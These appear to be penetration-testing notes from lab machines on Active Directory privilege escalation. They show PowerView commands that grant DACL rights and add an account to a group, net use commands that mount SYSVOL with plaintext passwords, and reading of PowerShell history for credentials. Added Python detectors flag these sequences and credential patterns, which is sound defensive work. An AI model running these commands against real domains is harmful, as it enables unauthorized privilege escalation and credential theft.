Domain Admin Techniques

This is a collection of techniques for reaching Domain Admin by several different routes, each with a linked example where one exists.

Assign a user to a group

```powershell
Import-Module ./PowerView.ps1
# Build a credential object for the account that holds rights over the group object
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('streamio\JDgodd', $SecPassword)
# Grant JDgodd rights on the "Core Staff" group object (PowerView's -Rights defaults to All)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -PrincipalIdentity "streamio\JDgodd"
# Use those rights to add JDgodd to the group, then confirm the new membership
Add-DomainGroupMember -Identity 'Core Staff' -Members 'streamio\JDgodd' -Credential $Cred
net group 'Core Staff'
```

Examples: [[StreamIO#dc6ecc]]
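From the defender's side, the chain above leaves two footprints in the Domain Controller's Security log: a 5136 "directory service object was modified" event on the group's nTSecurityDescriptor (when directory service change auditing is enabled) followed by a 4728/4732/4756 "member was added" event from the same principal. The following Python example is added here and is not part of the original notes; it correlates constructed sample events of those types and raises the severity when the DACL change and the add come from the same subject within a short window. Field names follow the EventData of the real Windows Security events; the timestamps, account names and domain DN are invented, and only the group name "Core Staff" is reused from the notes.

```python
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Set

# Security event IDs that record a member being added to a security-enabled group
# (4728 global, 4732 domain-local, 4756 universal) and a directory object being
# modified (5136), which is where a DACL change on a group object shows up.
GROUP_MEMBER_ADDED = {4728, 4732, 4756}
DS_OBJECT_MODIFIED = 5136

# Groups whose membership changes always warrant an alert. "Core Staff" is the
# custom group from the notes above; the rest are built-in privileged groups.
WATCHED_GROUPS = {"domain admins", "enterprise admins", "administrators", "core staff"}

# Constructed sample events. Field names follow the EventData of the real events;
# timestamps, account names and the domain DN are invented.
SAMPLE_EVENTS = [
    {"EventID": 4728, "TimeCreated": "2022-02-12T09:00:00", "SubjectUserName": "helpdesk1",
     "TargetUserName": "Printer Users", "TargetDomainName": "EXAMPLE",
     "MemberName": "CN=bob,CN=Users,DC=example,DC=local"},
    {"EventID": 5136, "TimeCreated": "2022-02-12T22:31:10", "SubjectUserName": "jdoe",
     "ObjectDN": "CN=Core Staff,CN=Users,DC=example,DC=local", "ObjectClass": "group",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "OperationType": "%%14674"},
    {"EventID": 4728, "TimeCreated": "2022-02-12T22:31:45", "SubjectUserName": "jdoe",
     "TargetUserName": "Core Staff", "TargetDomainName": "EXAMPLE",
     "MemberName": "CN=jdoe,CN=Users,DC=example,DC=local"},
]


def first_rdn(dn: str) -> str:
    """Lower-cased value of the first RDN: 'CN=Core Staff,CN=Users,...' -> 'core staff'."""
    return dn.split(",", 1)[0].split("=", 1)[1].strip().lower()


def detect_group_abuse(events: Iterable[Dict], watched: Set[str] = WATCHED_GROUPS,
                       window_minutes: float = 30) -> List[Dict]:
    """Return one alert per member added to a watched group.

    Severity is raised to 'critical' when the same subject changed the group's
    DACL (5136 on nTSecurityDescriptor) within `window_minutes` before the add,
    which is the WriteDACL-then-add sequence the PowerView commands above produce.
    """
    window = timedelta(minutes=window_minutes)
    ordered = sorted(events, key=lambda e: e["TimeCreated"])  # ISO-8601 strings sort chronologically
    dacl_changes = []  # (time, subject, group) for DACL changes on group objects
    alerts: List[Dict] = []
    for ev in ordered:
        when = datetime.fromisoformat(ev["TimeCreated"])
        eid = ev["EventID"]
        if (eid == DS_OBJECT_MODIFIED and ev.get("ObjectClass") == "group"
                and ev.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"):
            dacl_changes.append((when, ev["SubjectUserName"].lower(), first_rdn(ev["ObjectDN"])))
        elif eid in GROUP_MEMBER_ADDED:
            group = ev["TargetUserName"].lower()
            if group not in watched:
                continue
            subject = ev["SubjectUserName"].lower()
            member = first_rdn(ev["MemberName"])
            reasons = ["member added to watched group"]
            severity = "high"
            if member == subject:
                reasons.append("subject added itself to the group")
            if any(s == subject and g == group and when - window <= t <= when
                   for t, s, g in dacl_changes):
                reasons.append("same subject modified the group's DACL within the window")
                severity = "critical"
            alerts.append({"time": ev["TimeCreated"], "group": ev["TargetUserName"],
                           "member": member, "subject": ev["SubjectUserName"],
                           "severity": severity, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_group_abuse(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] {alert['time']} {alert['subject']} -> {alert['group']}: "
              + "; ".join(alert["reasons"]))
```

Run against the sample, the "Printer Users" add is ignored while the "Core Staff" add is reported as critical with all three reasons; shrinking the window below the 35-second gap between the two events drops it back to high, which is the knob to tune against how quickly legitimate delegation changes are followed by membership edits in your own environment.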

SYSVOL Share on the DC

We can enumerate the SMB shares on the compromised machine: ^cae2ef

```
PS C:\Users\BTables\Desktop> Get-SMBShare

Name   ScopeName Path Description
----   --------- ---- -----------
ADMIN$ *              Remote Admin
C$     *              Default share
IPC$   *              Remote IPC
```

We can try to connect to the shares on the DC:

```
PS C:\Users\BTables\Desktop> net use \\dc.fulcrum.local\IPC$ /user:FULCRUM\BTables ++FileServerLogon12345++
The command completed successfully.
```

And then we can list the shares in the DC:

```
PS C:\Users\BTables\Desktop> net view \\dc.fulcrum.local\
Shared resources at \\dc.fulcrum.local\
Share name  Type  Used as  Comment
-------------------------------------------------------------------------------
NETLOGON    Disk           Logon server share
SYSVOL      Disk           Logon server share
The command completed successfully.
```

We can then mount the SYSVOL share on the compromised machine to check its contents:

```
PS C:\Users\BTables\Desktop> net use x: \\dc.fulcrum.local\SYSVOL /user:FULCRUM\BTables ++FileServerLogon12345++

The command completed successfully.
```

And we find a ton of scripts inside the share:

```
PS X:\fulcrum.local\scripts> dir
    Directory: X:\fulcrum.local\scripts

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/12/2022  10:34 PM            340 00034421-648d-4835-9b23-c0d315d71ba3.ps1
-a----        2/12/2022  10:34 PM            340 0003ed3b-31a9-4d8f-a152-a234ecb522d4.ps1
```

PowerShell History

We can retrieve commands previously executed on a compromised machine by reading ConsoleHost_history.txt, the PSReadLine history file, which plays the same role as .bash_history on Linux. #Note If using this command we need to be in that user's profile folder, since the file is located under AppData:

```
PS C:\Users\legacyy> type AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
```

Examples: Timelapse
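Both of the last two sections rest on the same weakness: files readable by people other than their owner carrying credentials. SYSVOL is readable by every authenticated domain user by default, so any secret in a logon script or Group Policy Preferences file is domain-wide, and ConsoleHost_history.txt is readable by anyone who can read the profile folder. The Python example below is added here and is not part of the original notes; it scans constructed sample contents of both kinds of file for the credential shapes that appear in this page's own commands (a literal fed to ConvertTo-SecureString -AsPlainText, a password on a net use line, a GPP cpassword attribute) and reports file, line and pattern with the secret masked. The file paths, account names and secrets are all constructed, and the pattern set is this example's own choice.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Patterns for credentials embedded in scripts and shell history. Each captures the
# secret as a named group so the report can redact it. The set is this example's own
# choice, driven by the commands in the notes above; it is not exhaustive.
CREDENTIAL_PATTERNS = {
    # ConvertTo-SecureString 'literal' -AsPlainText (a variable instead of a literal is not flagged)
    "plaintext-securestring": re.compile(
        r"ConvertTo-SecureString\s+['\"](?P<secret>[^'\"]+)['\"]\s+-AsPlainText", re.IGNORECASE),
    # net use [drive:] \\server\share /user:DOMAIN\name <password>  (a trailing /switch is not a password)
    "net-use-password": re.compile(
        r"\bnet\s+use\b.*?/user:\S+\s+(?P<secret>[^/\s]\S*)", re.IGNORECASE),
    # Group Policy Preferences XML carrying a cpassword attribute
    "gpp-cpassword": re.compile(r'cpassword="(?P<secret>[^"]+)"', re.IGNORECASE),
}

# Constructed sample files: two from a SYSVOL tree and one PSReadLine history file.
# Paths, account names and secrets are invented; {GUID-PLACEHOLDER} stands for a GPO id.
SAMPLE_FILES = {
    r"SYSVOL\example.local\scripts\map-drives.ps1": (
        "# map the finance share for every user\n"
        "net use F: \\\\fs01.example.local\\finance /user:EXAMPLE\\svc_map Summer2022!\n"
        "Write-Host 'mapped'\n"
    ),
    r"SYSVOL\example.local\Policies\{GUID-PLACEHOLDER}\Machine\Preferences\Groups\Groups.xml":
        '<User name="localadmin" cpassword="AAABBBCCC=" />\n',
    r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt": (
        "Get-Process\n"
        "$p = ConvertTo-SecureString 'P@ssw0rd!' -AsPlainText -Force\n"
        "Get-ChildItem\n"
    ),
}


@dataclass
class Finding:
    source: str         # file the line came from
    line_no: int        # 1-based line number within that file
    pattern: str        # which CREDENTIAL_PATTERNS entry matched
    redacted_line: str  # the line with the secret masked, safe to put in a report


def scan_text(source: str, text: str) -> List[Finding]:
    """Scan one file's contents; returns one Finding per (line, pattern) match."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for name, pattern in CREDENTIAL_PATTERNS.items():
            match = pattern.search(line)
            if match:
                secret = match.group("secret")
                findings.append(Finding(source, line_no, name, line.replace(secret, "*" * 8)))
    return findings


def scan_files(files: Dict[str, str]) -> List[Finding]:
    """Scan a mapping of path -> contents, e.g. built by walking a mounted SYSVOL share."""
    findings: List[Finding] = []
    for source, text in files.items():
        findings.extend(scan_text(source, text))
    return findings


if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f.source}:{f.line_no} [{f.pattern}] {f.redacted_line}")
```

In practice the mapping is built by walking the mounted share (X:\ in the notes above) and the PSReadline folder of each profile on a host; the secrets are masked in the output precisely so the report can be handed to the script owners without re-leaking them, and a positive hit in SYSVOL is a rotate-and-remove, since every domain account could already have read it.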